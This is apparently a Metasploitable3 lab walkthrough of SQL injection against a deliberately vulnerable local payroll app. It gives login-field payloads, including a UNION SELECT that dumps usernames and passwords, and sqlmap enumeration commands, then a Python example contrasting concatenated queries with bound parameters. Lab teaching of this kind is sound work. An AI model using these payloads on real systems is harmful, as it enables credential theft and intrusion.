metasploitable3-solutions/Payroll_App_SQL_Injection_C...


For this tutorial you will need the following tools:

  • Browser (preferably Mozilla)
  • Burpsuite
  • SQLMap

  1. Try to log in using the following credentials:

| Field | Value |
| --- | --- |
| USERNAME | `admin` |
| PASSWORD | `admin` |

RESULTS: The webpage will display your username and no content.

  2. Try to log in using the following credentials:

| Field | Value |
| --- | --- |
| USERNAME | `'` |
| PASSWORD | `admin` |

RESULTS: The webpage will be blank.

  3. Try to log in using the following credentials:

| Field | Value |
| --- | --- |
| USERNAME | `' or 1;#'` |
| PASSWORD | `admin` |

RESULTS: The web page will return all the user content.

  4. Use SQLMap to extract the database using the following command:

    sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST

RESULTS: SQLMap will identify whether the web application is vulnerable to SQL injection.

  5. Use SQLMap to extract the columns in the table:

    sqlmap -u http://127.0.0.1:7000/payroll_app.php --data="user=admin&password=admin&s=OK" -p user --method POST --columns

RESULTS: SQLMap will retrieve the columns of the application tables.

  6. Use the column names to retrieve the user credentials:

| Field | Value |
| --- | --- |
| USERNAME | `' or 1 union select 1,username,password,1;#'` |
| PASSWORD | `admin` |

RESULTS: The web page will return the user credentials.
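The steps above work because the `user` field ends up inside the SQL text. The following is an added example, not code from the payroll application or this repository: it shows what each input from the steps turns into under string concatenation, and what a bound-parameter query returns for the same input. It uses an in-memory SQLite database as a stand-in; the `users` table, the `salary` column, the sample rows and the shape of the vulnerable query are assumptions.

```python
import sqlite3

# Inputs taken from the steps above; everything else here is constructed.
PAGE_INPUTS = [
    "admin",
    "'",
    "' or 1;#'",
    "' or 1 union select 1,username,password,1;#'",
]


def make_db():
    """In-memory stand-in database; table name and salary column are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, salary INTEGER)")
    # Plaintext passwords only to keep the sample short.
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "admin", 1000), ("alice", "s3cret", 2000)],
    )
    return db


def build_query_unsafe(user, password):
    """Assumed vulnerable pattern: form input pasted straight into the SQL text."""
    return (
        "SELECT username, salary FROM users "
        f"WHERE username = '{user}' AND password = '{password}'"
    )


def login_safe(db, user, password):
    """Placeholders keep the input as data; quotes and '#' are never parsed as SQL."""
    cur = db.execute(
        "SELECT username, salary FROM users WHERE username = ? AND password = ?",
        (user, password),
    )
    return cur.fetchall()


if __name__ == "__main__":
    db = make_db()
    for user in PAGE_INPUTS:
        print("input       :", repr(user))
        print("concatenated:", build_query_unsafe(user, "admin"))
        print("bound result:", login_safe(db, user, "admin"))
```

With bound parameters only the genuine `admin`/`admin` pair matches a row; the other three inputs are compared as literal usernames and match nothing.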